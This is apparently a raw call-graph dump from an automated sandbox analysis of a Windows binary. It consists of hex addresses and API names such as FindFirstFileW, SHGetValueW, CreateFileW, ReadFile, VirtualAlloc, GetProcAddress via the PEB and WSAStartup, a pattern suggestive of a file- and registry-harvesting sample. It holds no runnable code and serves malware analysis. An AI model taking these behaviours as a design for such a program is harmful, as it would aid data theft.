40d0eb 9865->9866 9867 404ba7 4 API calls 9866->9867 9868 40d0fa 9867->9868 9869 404bee 7 API calls 9868->9869 9870 40d109 9869->9870 9871 404c4e 6 API calls 9870->9871 9872 40d123 9871->9872 9873 405872 4 API calls 9872->9873 9872->9880 9874 40d14a 9873->9874 9875 405872 4 API calls 9874->9875 9876 40d159 9875->9876 9877 405872 4 API calls 9876->9877 9878 40d16b 9877->9878 9879 405781 4 API calls 9878->9879 9881 40d179 9879->9881 9882 405872 4 API calls 9881->9882 9883 40d18b 9882->9883 9884 405762 4 API calls 9883->9884 9885 40d19f 9884->9885 9886 405872 4 API calls 9885->9886 9887 40d1b1 9886->9887 9888 405781 4 API calls 9887->9888 9889 40d1bf 9888->9889 9890 405872 4 API calls 9889->9890 9891 40d1d1 9890->9891 9892 405762 4 API calls 9891->9892 9892->9880 9247 40f16e 9248 4056bf 2 API calls 9247->9248 9249 40f17b 9248->9249 9250 412093 13 API calls 9249->9250 9251 40f19e 9250->9251 9252 412093 13 API calls 9251->9252 9253 40f1b6 9252->9253 9254 412093 13 API calls 9253->9254 9255 40f1cc 9254->9255 9256 412093 13 API calls 9255->9256 9257 40f1e2 9256->9257 9258 413aca 4 API calls 9257->9258 9259 40f1ef 9258->9259 9260 405695 2 API calls 9259->9260 9261 40f1fa 9260->9261 9262 40ce71 9263 413b28 7 API calls 9262->9263 9264 40ce78 9263->9264 9265 405b6f 6 API calls 9264->9265 9266 40ce83 9265->9266 9269 40ceba 9266->9269 9271 403d74 11 API calls 9266->9271 9275 40cec1 9266->9275 9267 403fbf 7 API calls 9268 40cecc 9267->9268 9270 403d74 11 API calls 9268->9270 9280 40cefb 9268->9280 9272 402bab 2 API calls 9269->9272 9273 40cee7 9270->9273 9274 40cead 9271->9274 9272->9275 9276 40cef4 9273->9276 9277 402bab 2 API calls 9273->9277 9274->9269 9279 402bab 2 API calls 9274->9279 9275->9267 9278 402bab 2 API calls 9276->9278 9277->9276 9278->9280 9279->9269 9281 406472 9282 4031e5 4 API calls 9281->9282 9283 406484 Sleep 9282->9283 9920 40ea77 9921 404bee 7 API calls 9920->9921 9922 40ea8e 9921->9922 9923 404bee 7 API calls 9922->9923 9931 40eb24 9922->9931 9924 40eaa7 9923->9924 9925 404bee 7 API calls 9924->9925 9926 40eab5 9925->9926 9927 404c4e 6 API calls 9926->9927 9928 40eacc 9927->9928 9929 405872 4 API calls 9928->9929 9928->9931 9930 40eaf2 9929->9930 9932 405872 4 API calls 9930->9932 9933 40eb01 9932->9933 9934 405872 4 API calls 9933->9934 9935 40eb13 9934->9935 9936 405762 4 API calls 9935->9936 9936->9931 9969 40f204 9970 405781 4 API calls 9969->9970 9971 40f214 9970->9971 9972 4057df 14 API calls 9971->9972 9973 40f226 9972->9973 9341 403c08 9342 4031e5 4 API calls 9341->9342 9343 403c1a DeleteFileW 9342->9343 9344 410a09 9345 41219c 15 API calls 9344->9345 9346 410a1b 9345->9346 9347 41219c 15 API calls 9346->9347 9348 410a23 9347->9348 9349 41219c 15 API calls 9348->9349 9350 410a2c 9349->9350 9351 41219c 15 API calls 9350->9351 9352 410a38 9351->9352 9353 404b22 7 API calls 9352->9353 9354 410a4c 9353->9354 9355 403fbf 7 API calls 9354->9355 9360 410a7a 9354->9360 9356 410a5c 9355->9356 9357 413a58 14 API calls 9356->9357 9362 410a71 9356->9362 9359 410a6b 9357->9359 9358 402bab 2 API calls 9358->9360 9361 402bab 2 API calls 9359->9361 9361->9362 9362->9358 9974 410d09 9975 410d56 9974->9975 9976 410d17 9974->9976 9978 413a58 14 API calls 9975->9978 9990 406642 9976->9990 9980 410d6f 9978->9980 9981 4056bf 2 API calls 9982 410d2e 9981->9982 10003 405641 9982->10003 9984 410d41 9985 413aca 4 API calls 9984->9985 9986 410d4a 9985->9986 9987 405695 2 API calls 9986->9987 9988 410d50 9987->9988 9989 4036a3 4 API calls 9988->9989 9989->9975 9991 406662 9990->9991 9992 4031e5 4 API calls 9991->9992 9993 406676 9992->9993 10007 4066bf 9993->10007 9998 4066b1 10001 4036a3 4 API calls 9998->10001 9999 4066a7 10000 4036a3 4 API calls 9999->10000 10002 4066ac 10000->10002 10001->10002 10002->9975 10002->9981 10004 40564d 10003->10004 10006 405673 10003->10006 10005 4056fc 4 API calls 10004->10005 10004->10006 10005->10006 10006->9984 10008 4031e5 4 API calls 10007->10008 10009 4066dc 10008->10009 10010 4066f6 SetLastError 10009->10010 10011 406708 GetLastError 10009->10011 10012 406693 10010->10012 10011->10012 10013 406713 10011->10013 10029 406455 10012->10029 10014 4031e5 4 API calls 10013->10014 10015 406725 10014->10015 10015->10012 10016 4031e5 4 API calls 10015->10016 10017 40673f 10016->10017 10018 406753 10017->10018 10019 406749 10017->10019 10021 4031e5 4 API calls 10018->10021 10020 4036a3 4 API calls 10019->10020 10020->10012 10022 406761 10021->10022 10023 40678a 10022->10023 10024 40677c 10022->10024 10026 4036a3 4 API calls 10023->10026 10025 4036a3 4 API calls 10024->10025 10027 406781 10025->10027 10026->10012 10028 4036a3 4 API calls 10027->10028 10028->10012 10030 4031e5 4 API calls 10029->10030 10031 406468 10030->10031 10031->9998 10031->9999 9363 40c509 9364 412093 13 API calls 9363->9364 9365 40c51e 9364->9365 9372 40910d 9373 404b22 7 API calls 9372->9373 9374 409124 9373->9374 9375 40917a 9374->9375 9376 405b6f 6 API calls 9374->9376 9377 40913e 9376->9377 9379 404b22 7 API calls 9377->9379 9384 409173 9377->9384 9378 402bab 2 API calls 9378->9375 9380 409153 9379->9380 9381 409408 18 API calls 9380->9381 9386 40916a 9380->9386 9383 409164 9381->9383 9382 402bab 2 API calls 9382->9384 9385 402bab 2 API calls 9383->9385 9384->9378 9385->9386 9386->9382 9390 410410 9391 4056bf 2 API calls 9390->9391 9392 41041b 9391->9392 9393 412093 13 API calls 9392->9393 9394 41043c 9393->9394 9395 413aca 4 API calls 9394->9395 9396 410449 9395->9396 9397 405695 2 API calls 9396->9397 9398 410454 9397->9398 9425 40c71a 9426 41219c 15 API calls 9425->9426 9427 40c728 9426->9427 10087 410b1a 10088 404bee 7 API calls 10087->10088 10089 410b31 10088->10089 10090 404bee 7 API calls 10089->10090 10100 410c6d 10089->10100 10091 410b5a 10090->10091 10092 404bee 7 API calls 10091->10092 10093 410b69 10092->10093 10094 404bee 7 API calls 10093->10094 10095 410b78 10094->10095 10096 404ba7 4 API calls 10095->10096 10097 410b86 10096->10097 10098 404ba7 4 API calls 10097->10098 10099 410b95 10098->10099 10099->10100 10101 405872 4 API calls 10099->10101 10102 410bd7 10101->10102 10103 405872 4 API calls 10102->10103 10104 410be8 10103->10104 10105 405872 4 API calls 10104->10105 10106 410bf9 10105->10106 10107 405781 4 API calls 10106->10107 10108 410c07 10107->10108 10109 405781 4 API calls 10108->10109 10113 410c15 10109->10113 10110 410c4e 10111 405762 4 API calls 10110->10111 10112 410c60 10111->10112 10112->10100 10114 403f9e 5 API calls 10112->10114 10113->10110 10120 405e5a 10113->10120 10114->10100 10117 4040bb 13 API calls 10118 410c44 10117->10118 10119 402bab 2 API calls 10118->10119 10119->10110 10121 402b7c 2 API calls 10120->10121 10122 405e72 10121->10122 10123 4031e5 4 API calls 10122->10123 10126 405ea3 10122->10126 10124 405e94 10123->10124 10125 402bab 2 API calls 10124->10125 10124->10126 10125->10126 10126->10110 10126->10117 10127 40f81c 10128 404bee 7 API calls 10127->10128 10130 40f833 10128->10130 10129 40f94f 10130->10129 10131 404bee 7 API calls 10130->10131 10132 40f85c 10131->10132 10133 404bee 7 API calls 10132->10133 10134 40f86b 10133->10134 10135 404bee 7 API calls 10134->10135 10136 40f87a 10135->10136 10137 404bee 7 API calls 10136->10137 10138 40f888 10137->10138 10139 404ba7 4 API calls 10138->10139 10140 40f897 10139->10140 10140->10129 10141 405872 4 API calls 10140->10141 10142 40f8d8 10141->10142 10143 405872 4 API calls 10142->10143 10144 40f8ea 10143->10144 10145 405872 4 API calls 10144->10145 10146 40f8fa 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f90c 10147->10148 10149 405781 4 API calls 10148->10149 10150 40f91d 10149->10150 10151 4040bb 13 API calls 10150->10151 10152 40f92d 10151->10152 10153 405762 4 API calls 10152->10153 10154 40f93f 10153->10154 10154->10129 10155 403f9e 5 API calls 10154->10155 10155->10129 9440 402c1f 9441 4031e5 4 API calls 9440->9441 9442 402c31 LoadLibraryW 9441->9442 10165 407e1f 10166 407e2c 10165->10166 10170 407e61 10165->10170 10167 407e3e 10166->10167 10171 402bab 2 API calls 10166->10171 10174 407e51 10166->10174 10168 407ed4 10167->10168 10175 402bab 2 API calls 10167->10175 10169 407eb6 10173 402bab 2 API calls 10169->10173 10169->10174 10170->10169 10176 405872 4 API calls 10170->10176 10182 407ea6 10170->10182 10171->10167 10172 402bab 2 API calls 10172->10169 10173->10174 10174->10168 10177 402bab 2 API calls 10174->10177 10175->10174 10178 407e86 10176->10178 10177->10168 10179 405872 4 API calls 10178->10179 10180 407e96 10179->10180 10181 405872 4 API calls 10180->10181 10181->10182 10182->10169 10182->10172 10183 40fa23 10184 40fa39 10183->10184 10185 410293 10184->10185 10186 405b6f 6 API calls 10184->10186 10187 40ffcc 10186->10187 10187->10185 10188 4040bb 13 API calls 10187->10188 10189 40ffeb 10188->10189 10190 41028c 10189->10190 10192 402b7c 2 API calls 10189->10192 10238 41027d 10189->10238 10191 402bab 2 API calls 10190->10191 10191->10185 10194 41001e 10192->10194 10193 403f9e 5 API calls 10193->10190 10195 40a423 4 API calls 10194->10195 10194->10238 10196 41004a 10195->10196 10197 4031e5 4 API calls 10196->10197 10198 41005c 10197->10198 10199 4031e5 4 API calls 10198->10199 10200 410079 10199->10200 10201 4031e5 4 API calls 10200->10201 10202 410096 10201->10202 10203 4031e5 4 API calls 10202->10203 10204 4100b0 10203->10204 10205 4031e5 4 API calls 10204->10205 10206 4100cd 10205->10206 10207 4031e5 4 API calls 10206->10207 10208 4100ea 10207->10208 10239 412516 10208->10239 10210 4100fd 10211 40642c 5 API calls 10210->10211 10212 41013e 10211->10212 10213 410142 10212->10213 10214 41019f 10212->10214 10215 40488c 5 API calls 10213->10215 10217 4031e5 4 API calls 10214->10217 10216 410151 10215->10216 10218 41019c 10216->10218 10219 404866 4 API calls 10216->10219 10230 4101bb 10217->10230 10220 41022a 10218->10220 10222 40642c 5 API calls 10218->10222 10221 410163 10219->10221 10226 413a58 14 API calls 10220->10226 10223 41018e 10221->10223 10225 406c4c 6 API calls 10221->10225 10224 410201 10222->10224 10227 403c40 5 API calls 10223->10227 10228 410205 10224->10228 10229 41022f 10224->10229 10231 410178 10225->10231 10232 41026e 10226->10232 10227->10218 10233 4126a7 7 API calls 10228->10233 10242 4125db 10229->10242 10235 4031e5 4 API calls 10230->10235 10236 406c4c 6 API calls 10231->10236 10237 402bab 2 API calls 10232->10237 10233->10220 10235->10218 10236->10223 10237->10238 10238->10193 10240 4031e5 4 API calls 10239->10240 10241 412539 10240->10241 10241->10210 10243 40488c 5 API calls 10242->10243 10244 4125ec 10243->10244 10245 41269f 10244->10245 10246 4031e5 4 API calls 10244->10246 10245->10220 10247 412609 10246->10247 10248 4031e5 4 API calls 10247->10248 10253 41268f 10247->10253 10250 41262a 10248->10250 10249 403c40 5 API calls 10249->10245 10258 412675 10250->10258 10259 4124f1 10250->10259 10251 4031e5 4 API calls 10251->10253 10253->10249 10255 412663 10257 4031e5 4 API calls 10255->10257 10256 4124f1 4 API calls 10256->10255 10257->10258 10258->10251 10260 4031e5 4 API calls 10259->10260 10261 412503 10260->10261 10261->10255 10261->10256 10273 410927 10274 4044ee 8 API calls 10273->10274 10275 41093d 10274->10275 10276 4109a4 10275->10276 10277 4056bf 2 API calls 10275->10277 10280 410954 10277->10280 10278 4044ee 8 API calls 10278->10280 10280->10278 10281 410990 10280->10281 10282 402bab 2 API calls 10280->10282 10288 41080e 10280->10288 10283 413aca 4 API calls 10281->10283 10282->10280 10284 410998 10283->10284 10285 405695 2 API calls 10284->10285 10286 41099e 10285->10286 10287 402bab 2 API calls 10286->10287 10287->10276 10289 410821 10288->10289 10299 41091f 10289->10299 10300 410701 10289->10300 10292 405872 4 API calls 10293 410900 10292->10293 10294 405872 4 API calls 10293->10294 10295 41090d 10294->10295 10296 405872 4 API calls 10295->10296 10297 410919 10296->10297 10298 402bab 2 API calls 10297->10298 10298->10299 10299->10280 10301 405f08 4 API calls 10300->10301 10303 410713 10301->10303 10302 410804 10302->10292 10302->10299 10303->10302 10304 402b7c 2 API calls 10303->10304 10306 410748 10304->10306 10305 402bab 2 API calls 10305->10302 10307 402b7c 2 API calls 10306->10307 10309 4107fd 10306->10309 10310 4107ad 10307->10310 10308 402bab 2 API calls 10308->10309 10309->10305 10310->10308 9510 40f12f 9511 41219c 15 API calls 9510->9511 9512 40f13f 9511->9512 9513 41219c 15 API calls 9512->9513 9514 40f14c 9513->9514 9515 41219c 15 API calls 9514->9515 9516 40f159 9515->9516 9517 41219c 15 API calls 9516->9517 9518 40f166 9517->9518 9525 40ed35 9526 4056bf 2 API calls 9525->9526 9527 40ed42 9526->9527 9528 412093 13 API calls 9527->9528 9529 40ed63 9528->9529 9530 412093 13 API calls 9529->9530 9531 40ed73 9530->9531 9532 413aca 4 API calls 9531->9532 9533 40ed80 9532->9533 9534 405695 2 API calls 9533->9534 9535 40ed8e 9534->9535 8064 40f3c5 8069 41219c 8064->8069 8067 41219c 15 API calls 8068 40f3e1 8067->8068 8070 4121b1 8069->8070 8086 40f3d3 8069->8086 8071 4121be 8070->8071 8074 4121c5 8070->8074 8118 413ba4 8071->8118 8073 4121ca 8087 404056 8073->8087 8074->8073 8080 412210 8074->8080 8076 4121c3 8076->8086 8095 405b6f 8076->8095 8079 41224d 8083 402bab 2 API calls 8079->8083 8079->8086 8080->8086 8123 403fbf 8080->8123 8083->8086 8086->8067 8134 402b7c GetProcessHeap RtlAllocateHeap 8087->8134 8089 404066 8092 404095 8089->8092 8136 4031e5 8089->8136 8092->8076 8093 404099 8094 402bab 2 API calls 8093->8094 8094->8092 8096 405b7d 8095->8096 8097 402b7c 2 API calls 8096->8097 8098 405b99 8097->8098 8107 405c02 8098->8107 8172 4059b8 8098->8172 8100 405bba 8101 405c09 8100->8101 8103 402b7c 2 API calls 8100->8103 8102 402bab 2 API calls 8101->8102 8102->8107 8104 405bdd 8103->8104 8104->8101 8105 405be4 8104->8105 8106 402bab 2 API calls 8105->8106 8106->8107 8107->8079 8108 413a58 8107->8108 8109 413a63 8108->8109 8117 412245 8108->8117 8109->8117 8175 405781 8109->8175 8112 405781 4 API calls 8113 413aa0 8112->8113 8178 4057df 8113->8178 8116 405781 4 API calls 8116->8117 8131 402bab 8117->8131 8119 413bad 8118->8119 8120 404056 7 API calls 8119->8120 8122 413bb8 8119->8122 8121 413bc5 8120->8121 8121->8076 8122->8076 8124 402b7c 2 API calls 8123->8124 8126 403fcf 8124->8126 8125 403ff4 8125->8076 8126->8125 8297 403b98 8126->8297 8129 403ff8 GetLastError 8130 402bab 2 API calls 8129->8130 8130->8125 8132 402bb4 GetProcessHeap HeapFree 8131->8132 8133 402bc6 8131->8133 8132->8133 8133->8079 8135 402b98 8134->8135 8135->8089 8137 403236 8136->8137 8139 4031f3 8136->8139 8147 4030a5 8137->8147 8139->8137 8141 403208 8139->8141 8140 403224 8142 403258 SHGetFolderPathW 8140->8142 8144 4031e5 4 API calls 8140->8144 8153 403263 8141->8153 8142->8092 8142->8093 8144->8142 8145 40320d 8145->8142 8146 4030a5 4 API calls 8145->8146 8146->8140 8159 402ca4 8147->8159 8149 4030b0 8150 4030b5 8149->8150 8163 4030c4 8149->8163 8150->8140 8154 40326d 8153->8154 8155 402b7c 2 API calls 8154->8155 8158 4032b7 8154->8158 8156 40328c 8155->8156 8157 402b7c 2 API calls 8156->8157 8157->8158 8158->8145 8160 403079 8159->8160 8161 40307c 8160->8161 8167 40317b GetPEB 8160->8167 8161->8149 8164 4030eb 8163->8164 8165 4030c0 8164->8165 8169 402c03 8164->8169 8165->8140 8168 40319b 8167->8168 8168->8161 8170 4031e5 3 API calls 8169->8170 8171 402c15 GetProcAddress 8170->8171 8171->8165 8173 4031e5 4 API calls 8172->8173 8174 4059cb 8173->8174 8174->8100 8193 405797 8175->8193 8177 405792 8177->8112 8179 4057eb 8178->8179 8192 405832 8178->8192 8179->8192 8203 4040bb 8179->8203 8182 405839 8184 405853 8182->8184 8230 405627 8182->8230 8183 40582c 8227 403f9e 8183->8227 8241 405762 8184->8241 8191 403f9e 5 API calls 8191->8192 8192->8116 8192->8117 8194 4057a1 8193->8194 8196 4057bd 8193->8196 8194->8196 8197 4056fc 8194->8197 8196->8177 8198 405714 8197->8198 8199 402b7c 2 API calls 8198->8199 8201 405730 8199->8201 8200 405752 8200->8196 8201->8200 8202 402bab 2 API calls 8201->8202 8202->8200 8204 4031e5 4 API calls 8203->8204 8205 4040d5 CreateFileW 8204->8205 8206 4040f8 8205->8206 8207 40418d 8205->8207 8209 4031e5 4 API calls 8206->8209 8208 404183 8207->8208 8247 403c90 8207->8247 8208->8182 8208->8183 8208->8192 8214 404105 8209->8214 8212 40416d 8244 403c40 8212->8244 8214->8212 8218 4031e5 4 API calls 8214->8218 8217 402bab 2 API calls 8217->8208 8220 404131 VirtualAlloc 8218->8220 8219 4040bb 10 API calls 8221 4041c8 8219->8221 8220->8212 8222 404142 8220->8222 8221->8217 8223 4031e5 4 API calls 8222->8223 8224 40414f ReadFile 8223->8224 8224->8212 8225 404160 8224->8225 8226 4031e5 4 API calls 8225->8226 8226->8212 8228 4031e5 4 API calls 8227->8228 8229 403fb1 VirtualFree 8228->8229 8229->8192 8231 4031e5 4 API calls 8230->8231 8232 40563a 8231->8232 8233 405872 8232->8233 8235 405881 8233->8235 8234 4058bc 8237 405797 4 API calls 8234->8237 8239 4058af 8234->8239 8235->8234 8294 4058d4 8235->8294 8237->8239 8239->8184 8240 405781 4 API calls 8240->8234 8242 405781 4 API calls 8241->8242 8243 405770 8242->8243 8243->8191 8245 4031e5 4 API calls 8244->8245 8246 403c52 CloseHandle 8245->8246 8246->8208 8248 403ca3 8247->8248 8251 403caa 8247->8251 8274 405dc5 8248->8274 8250 404056 7 API calls 8252 403cbe 8250->8252 8251->8250 8253 403d3a 8251->8253 8254 403d2e 8252->8254 8255 403d17 8252->8255 8256 403ccf 8252->8256 8253->8208 8270 403c59 8253->8270 8254->8253 8257 402bab 2 API calls 8254->8257 8258 405b6f 6 API calls 8255->8258 8259 405b6f 6 API calls 8256->8259 8257->8253 8260 403d14 8258->8260 8261 403cdd 8259->8261 8264 402bab 2 API calls 8260->8264 8262 405b6f 6 API calls 8261->8262 8263 403cee 8262->8263 8263->8260 8279 403d4d 8263->8279 8264->8254 8267 403d0b 8269 402bab 2 API calls 8267->8269 8269->8260 8271 403c21 8270->8271 8272 4031e5 4 API calls 8271->8272 8273 403c33 8272->8273 8273->8219 8273->8221 8288 406799 8274->8288 8276 405dd5 8277 402b7c 2 API calls 8276->8277 8278 405dfe 8277->8278 8278->8251 8291 403bb7 8279->8291 8281 403cfe 8281->8267 8282 403c62 8281->8282 8283 403d4d 5 API calls 8282->8283 8284 403c6d 8283->8284 8285 403c72 8284->8285 8286 4031e5 4 API calls 8284->8286 8285->8267 8287 403c87 CreateDirectoryW 8286->8287 8287->8267 8289 4031e5 4 API calls 8288->8289 8290 4067ad 8289->8290 8290->8276 8292 4031e5 4 API calls 8291->8292 8293 403bc9 GetFileAttributesW 8292->8293 8293->8281 8295 405797 4 API calls 8294->8295 8296 4058a8 8295->8296 8296->8239 8296->8240 8298 4031e5 4 API calls 8297->8298 8299 403baa 8298->8299 8299->8125 8299->8129 9688 40ebc6 9689 4040bb 13 API calls 9688->9689 9690 40ebdf 9689->9690 9696 40ecd7 9690->9696 9708 407795 9690->9708 9693 40eccd 9694 403f9e 5 API calls 9693->9694 9694->9696 9695 4056bf 2 API calls 9707 40ec12 9695->9707 9697 40ecb5 9698 402bab 2 API calls 9697->9698 9699 40ecbd 9698->9699 9700 413aca 4 API calls 9699->9700 9702 40ecc7 9700->9702 9701 407908 GetProcessHeap RtlAllocateHeap 9701->9707 9703 405695 2 API calls 9702->9703 9703->9693 9705 402bab GetProcessHeap HeapFree 9705->9707 9706 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9706->9707 9707->9697 9707->9701 9707->9705 9707->9706 9719 412269 9707->9719 9709 4077ab 9708->9709 9715 4077b3 9709->9715 9726 405ae9 9709->9726 9711 4077e1 9712 407802 9711->9712 9713 4077f8 9711->9713 9711->9715 9716 402b7c 2 API calls 9712->9716 9714 402bab 2 API calls 9713->9714 9714->9715 9715->9693 9715->9695 9717 407811 9716->9717 9718 402bab 2 API calls 9717->9718 9718->9715 9742 40374e 9719->9742 9722 412299 9722->9707 9723 4037be 4 API calls 9724 412291 9723->9724 9725 402bab 2 API calls 9724->9725 9725->9722 9727 405af7 9726->9727 9728 402b7c 2 API calls 9727->9728 9729 405b03 9728->9729 9738 405b5a 9729->9738 9739 405998 9729->9739 9731 405b21 9732 405b61 9731->9732 9734 402b7c 2 API calls 9731->9734 9733 402bab 2 API calls 9732->9733 9733->9738 9735 405b39 9734->9735 9735->9732 9736 405b40 9735->9736 9737 402bab 2 API calls 9736->9737 9737->9738 9738->9711 9740 4031e5 4 API calls 9739->9740 9741 4059ab 9740->9741 9741->9731 9743 402b7c 2 API calls 9742->9743 9744 40375f 9743->9744 9745 4031e5 4 API calls 9744->9745 9748 4037a3 9744->9748 9746 40378f 9745->9746 9747 402bab 2 API calls 9746->9747 9746->9748 9747->9748 9748->9722 9748->9723 8897 410cd1 8902 412093 8897->8902 8900 412093 13 API calls 8901 410cff 8900->8901 8905 4120a5 8902->8905 8923 410cf1 8902->8923 8903 4120b3 8904 404056 7 API calls 8903->8904 8906 4120ba 8904->8906 8905->8903 8909 412100 8905->8909 8907 405b6f 6 API calls 8906->8907 8908 412152 8906->8908 8906->8923 8910 412125 8907->8910 8924 403d74 8908->8924 8912 403fbf 7 API calls 8909->8912 8909->8923 8910->8908 8915 412139 8910->8915 8916 41214d 8910->8916 8912->8906 8914 41218c 8919 402bab 2 API calls 8914->8919 8914->8923 8918 402bab 2 API calls 8915->8918 8920 402bab 2 API calls 8916->8920 8917 402bab 2 API calls 8917->8914 8921 41213e 8918->8921 8919->8923 8920->8908 8922 402bab 2 API calls 8921->8922 8922->8923 8923->8900 8925 403d87 8924->8925 8926 403ea3 8925->8926 8927 405b6f 6 API calls 8925->8927 8928 405b6f 6 API calls 8926->8928 8929 403da3 8927->8929 8930 403eb9 8928->8930 8929->8926 8931 4031e5 4 API calls 8929->8931 8932 4031e5 4 API calls 8930->8932 8939 403f6f 8930->8939 8933 403dbc FindFirstFileW 8931->8933 8934 403ed3 FindFirstFileW 8932->8934 8936 403dd1 8933->8936 8945 403e9c 8933->8945 8949 403ee8 8934->8949 8954 403f8d 8934->8954 8935 402bab 2 API calls 8935->8926 8938 4031e5 4 API calls 8936->8938 8946 405b6f 6 API calls 8936->8946 8953 403d74 7 API calls 8936->8953 8958 402bab 2 API calls 8936->8958 8959 403f63 8936->8959 8937 402bab 2 API calls 8937->8939 8940 403e84 FindNextFileW 8938->8940 8939->8914 8939->8917 8940->8936 8941 403e96 8940->8941 8963 403bef 8941->8963 8942 405b6f 6 API calls 8942->8949 8943 4031e5 4 API calls 8947 403f50 FindNextFileW 8943->8947 8945->8935 8946->8936 8948 403f87 8947->8948 8947->8949 8951 403bef 5 API calls 8948->8951 8949->8942 8949->8943 8950 403f75 8949->8950 8957 402bab 2 API calls 8949->8957 8952 402bab 2 API calls 8950->8952 8951->8954 8955 403f7b 8952->8955 8953->8936 8954->8937 8956 403bef 5 API calls 8955->8956 8956->8939 8957->8949 8958->8936 8960 402bab 2 API calls 8959->8960 8961 403f69 8960->8961 8962 403bef 5 API calls 8961->8962 8962->8939 8964 4031e5 4 API calls 8963->8964 8965 403c01 FindClose 8964->8965 8965->8945 9152 4049dc 9153 4031e5 4 API calls 9152->9153 9154 4049ef SHEnumKeyExW 9153->9154 9824 40cddd 9825 405b6f 6 API calls 9824->9825 9826 40cdee 9825->9826 9827 40ce06 9826->9827 9828 413a58 14 API calls 9826->9828 9830 405b6f 6 API calls 9827->9830 9835 40ce59 9827->9835 9829 40ce00 9828->9829 9831 402bab 2 API calls 9829->9831 9832 40ce1c 9830->9832 9831->9827 9833 403d74 11 API calls 9832->9833 9832->9835 9838 40ce52 9832->9838 9836 40ce45 9833->9836 9834 402bab 2 API calls 9834->9835 9837 402bab 2 API calls 9836->9837 9836->9838 9837->9838 9838->9834 9155 40ecde 9156 412093 13 API calls 9155->9156 9157 40ecfd 9156->9157 9158 412093 13 API calls 9157->9158 9159 40ed0d 9158->9159 9163 40e8df 9164 412093 13 API calls 9163->9164 9165 40e8f8 9164->9165 9166 412093 13 API calls 9165->9166 9167 40e908 9166->9167 9174 404b22 9167->9174 9169 40e91c 9172 40e936 9169->9172 9173 40e93d 9169->9173 9181 40e944 9169->9181 9171 402bab 2 API calls 9171->9173 9172->9171 9175 402b7c 2 API calls 9174->9175 9176 404b33 9175->9176 9179 404b66 9176->9179 9190 4049b3 9176->9190 9178 404b5f 9178->9179 9180 402bab 2 API calls 9178->9180 9179->9169 9180->9179 9182 4056bf 2 API calls 9181->9182 9183 40e952 9182->9183 9184 40e976 9183->9184 9185 4057df 14 API calls 9183->9185 9184->9172 9186 40e966 9185->9186 9187 413aca 4 API calls 9186->9187 9188 40e970 9187->9188 9189 405695 2 API calls 9188->9189 9189->9184 9191 4031e5 4 API calls 9190->9191 9192 4049c6 SHGetValueW 9191->9192 9192->9178 9193 4139de 9202 413855 9193->9202 9195 4139f1 9196 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9195->9196 9197 4139f7 9196->9197 9198 413866 66 API calls 9197->9198 9199 413a2d 9198->9199 9200 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9199->9200 9201 413a34 9200->9201 9203 4031e5 4 API calls 9202->9203 9204 413864 9203->9204 9204->9204 9844 4116e7 9845 4117ba 9844->9845 9846 4117f1 9845->9846 9847 405b6f 6 API calls 9845->9847 9848 4117d0 9847->9848 9848->9846 9849 404cbf 9 API calls 9848->9849 9850 4117eb 9849->9850 9851 402bab 2 API calls 9850->9851 9851->9846 9224 4094e7 9225 404b22 7 API calls 9224->9225 9226 4094fe 9225->9226 9227 409554 9226->9227 9228 405b6f 6 API calls 9226->9228 9229 409514 9228->9229 9230 40954d 9229->9230 9232 404b22 7 API calls 9229->9232 9231 402bab 2 API calls 9230->9231 9231->9227 9233 40952d 9232->9233 9235 409408 18 API calls 9233->9235 9238 409544 9233->9238 9234 402bab 2 API calls 9234->9230 9236 40953e 9235->9236 9237 402bab 2 API calls 9236->9237 9237->9238 9238->9234 9893 40d4ea 9894 404bee 7 API calls 9893->9894 9895 40d500 9894->9895 9896 404bee 7 API calls 9895->9896 9901 40d5a0 9895->9901 9897 40d529 9896->9897 9898 404bee 7 API calls 9897->9898 9899 40d537 9898->9899 9900 404bee 7 API calls 9899->9900 9902 40d546 9900->9902 9902->9901 9903 405872 4 API calls 9902->9903 9904 40d56d 9903->9904 9905 405872 4 API calls 9904->9905 9906 40d57c 9905->9906 9907 405872 4 API calls 9906->9907 9908 40d58e 9907->9908 9909 405872 4 API calls 9908->9909 9909->9901 9910 4058ea 9911 4031e5 4 API calls 9910->9911 9912 4058fd 9911->9912 9913 40a3ea 9914 40374e 6 API calls 9913->9914 9915 40a403 9914->9915 9916 4059d8 4 API calls 9915->9916 9919 40a419 9915->9919 9917 40a411 9916->9917 9918 402bab 2 API calls 9917->9918 9918->9919 9284 404df3 WSAStartup 9288 4091f6 9289 404b22 7 API calls 9288->9289 9290 40920b 9289->9290 9291 409222 9290->9291 9292 409408 18 API calls 9290->9292 9293 40921c 9292->9293 9294 402bab 2 API calls 9293->9294 9294->9291 9946 4117fe 9947 404c4e 6 API calls 9946->9947 9948 411888 9947->9948 9949 404c4e 6 API calls 9948->9949 9951 411925 9948->9951 9950 4118ab 9949->9950 9950->9951 9965 4119b3 9950->9965 9953 4118c5 9954 4119b3 4 API calls 9953->9954 9955 4118d0 9954->9955 9955->9951 9956 4056bf 2 API calls 9955->9956 9957 4118fd 9956->9957 9958 405872 4 API calls 9957->9958 9959 41190a 9958->9959 9960 405872 4 API calls 9959->9960 9961 411915 9960->9961 9962 413aca 4 API calls 9961->9962 9963 41191f 9962->9963 9964 405695 2 API calls 9963->9964 9964->9951 9966 4119c6 9965->9966 9967 4119bf 9965->9967 9968 4031e5 4 API calls 9966->9968 9967->9953 9968->9967 9298 40e880 9299 41219c 15 API calls 9298->9299 9300 40e88e 9299->9300 9301 41219c 15 API calls 9300->9301 9302 40e89c 9301->9302 10032 40e48a 10033 404bee 7 API calls 10032->10033 10035 40e4d0 10033->10035 10034 40e4f4 10035->10034 10036 405872 4 API calls 10035->10036 10036->10034 9399 410390 9400 404b22 7 API calls 9399->9400 9401 4103a5 9400->9401 9402 410409 9401->9402 9403 405b6f 6 API calls 9401->9403 9408 4103ba 9403->9408 9404 410402 9405 402bab 2 API calls 9404->9405 9405->9402 9406 4103fb 9407 402bab 2 API calls 9406->9407 9407->9404 9408->9404 9408->9406 9409 403d74 11 API calls 9408->9409 9410 4103ee 9409->9410 9410->9406 9411 402bab 2 API calls 9410->9411 9411->9406 10047 40ed96 10048 4040bb 13 API calls 10047->10048 10062 40edb0 10048->10062 10049 40ef90 10050 40ef87 10051 403f9e 5 API calls 10050->10051 10051->10049 10052 405ae9 6 API calls 10052->10062 10053 412269 6 API calls 10053->10062 10054 40ef61 10055 40ef6e 